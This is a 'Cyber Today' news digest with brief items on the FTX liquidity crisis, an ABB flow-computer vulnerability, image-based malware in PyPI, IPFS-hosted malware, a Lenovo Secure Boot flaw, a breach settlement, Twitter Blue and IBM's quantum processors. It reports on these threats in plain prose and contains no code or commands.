Cyber Today: Crypto Winter comes for FTX, oil and gas flow control vulnerability, images hide malware in PyPI
Crypto Winter comes for FTX
Earlier this week, crypto exchange Binance signed a letter of intent to acquire its rival FTX. This comes after FTX experienced a liquidity crunch and reached out to Binance for assistance. The letter did not bind Binance to complete the acquisition. However, less than a day after signing the deal, Coindesk’s sources say Binance appears highly unlikely to go forward with the acquisition. FTX’s loan commitments reportedly raise concerns about proceding with the acquisition. Over the last three days, FTX saw over $6 billion in withdrawals. Additionally Bloomberg’s source say the U.S. Securities and Exchange Commission and Commodity Futures Trading Commission began investigating FTX’s relationship with its sister entity Alameda Research about potentially mishandling of customer funds.
Vulnerability found in oil and gas utilities
Researchers at the security company Claroty discovered a vulnerability in a widely deployed flow computer system used across oil and gas utilities. These computers calculate oil and gas volume and flow rates, essential for operations but also for billing. The “high-severity path-traversal vulnerability” would allow an attacker to take over a flow computer and remotely disrupt its ability for accurate measurements, letting an attacker obtain root access. The maker of the system, ABB said it issued an advisory on the vulnerability to customers on July 14th, and issued an update to resolve the issue. The company also advised that “proper network segmentation” can also adequately mitigate the vulnerability.
PyPI packages hiding malware in image files
Another day, another piece of malware hiding in the Python Package Index. Researchers at Check Point Research sent out an advisory warning about a malicious packages named “apicolor.” This contained an odd non-trivial code section at the beginning of its installation script. This downloaded a picture from the web. The installed package would then process the image and trigger the processing generated output using the exec command. Check Point notes that it regularly scans PyPI for malicious packages, but said this stood out a “unique and distinct” approach. While many malicious packages in PyPI come as a result of copy and paste techniques, this approach shows that obfuscation methods on the index evolve rapidly.
Experian and T-Mobile settle on breaches
The two separately reached agreements with 40 US states to resolve data lost in breaches from 2012 and 2015. Experian will pay the bulk of the settlement at $14 million, with $2 million paid by the wireless carrier. The 2012 breach at Experian involved an inside actor brought into the company through an acquisition. The employee sold data on over 3 million queries to third-parties. The company did not alert regulators or impacted customers. The 2015 breach impacted Experian’s network, where T-Mobile stored customer credit applications, impacting 15 million people. Experian offered two years of free credit monitoring after that breach. The settlement will see them providing an additional five years, as well as free regular credit reports.
Thanks to today’s episode sponsor, AppOmni
Twitter rolls out Blue verification
Twitter rolled out its expected update to its Blue subscription service for iOS, which now authenticates users as part of the $7.99 subscription. It’s unclear when it will arrive on Android, the web app, or in new markets. The company also tested out showing a gray check mark on select accounts labeling them as “Official,” although owner Elon Musk summarily announced that he “killed it.” Right now Blue only offers early access to new features, with Twitter promising longer video uploads, priority surfacing in search, and fewer ads as “coming soon.”
IPFS used for malware hosting
The distributed InterPlanetary File System or IPFS represents a building block of web3. It also turns out it’s a great way to host malware. That comes from researchers at Cisco Talos, which found it being used by multiple malware families to retrieve initial malware stages. IPFS allows an attacker to efficiently make local content available on multiple nodes automatically without cost. Because the hash tables for the files are maintained across IPFS gateways, it’s resilient to takedowns without invoking a storage cost. The vectors of malware remain the same, attackers must still direct victims to an IPFS file. Cisco recommends organizations not involved in web3 simply block access to all IPFS gateways.
Lenovo fixes UEFI Secure Boot
Security researchers at ESET discovered that Lenovo mistakenly included an early development driver that would allow a user to change secure boot settings for the OS in its final production versions. This impacted 54 laptops across Lenovo’s ThinkBook, IdeaPad, and Yoga lines, letting an attacker deactivate UEFI Secure Boot. This system is meant to ensure malicious code can’t load and execute during the boot process. Without it, someone with access to a machine could bypass OS-level security protections and install malware that persists after an OS wipe. Lenovo released a BIOS fix to resolve the issue on all machines, except for one Ideapad model that reached end of life.
IBM plans to scale up quantum computers
IBM launched its new Osprey quantum processor, offering 433 qubits, 240% more than its last-gen Eagle processor from 2021. Big Blue’s current quantum roadmap ultimately plans to release a 4,000-qubit Kookaburra processor in 2025, preceded by a 1,121-qubit Condor processor next year and the 1,386-qubit Flamingo in 2024. The company also updated its Qiskit Runtime to make programming these larger chips a little easier, letting developers trade speed for a reduced error count, something that can be an issue in quantum systems. IBM also provided more details on its upcoming Quantum System Two, with a planned 2023 launch. THis will integrate multiple quantum processors into a single system with high-speed links.
Suggest an edit to this article
Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.
Remember, CyberSecurity Starts With You!
- Globally, 30,000 websites are hacked daily.
- 64% of companies worldwide have experienced at least one form of a cyber attack.
- There were 20M breached records in March 2021.
- In 2020, ransomware cases grew by 150%.
- Email is responsible for around 94% of all malware.
- Every 39 seconds, there is a new attack somewhere on the web.
- An average of around 24,000 malicious mobile apps are blocked daily on the internet.
- Voice ID: How Secure is it Really? - 2 March 2023
- Enterprise users infected by RIG Exploit Kit thanks to Internet Explorer - 27 February 2023
- Google Open-Source Vulnerability Scanning Tool - 18 February 2023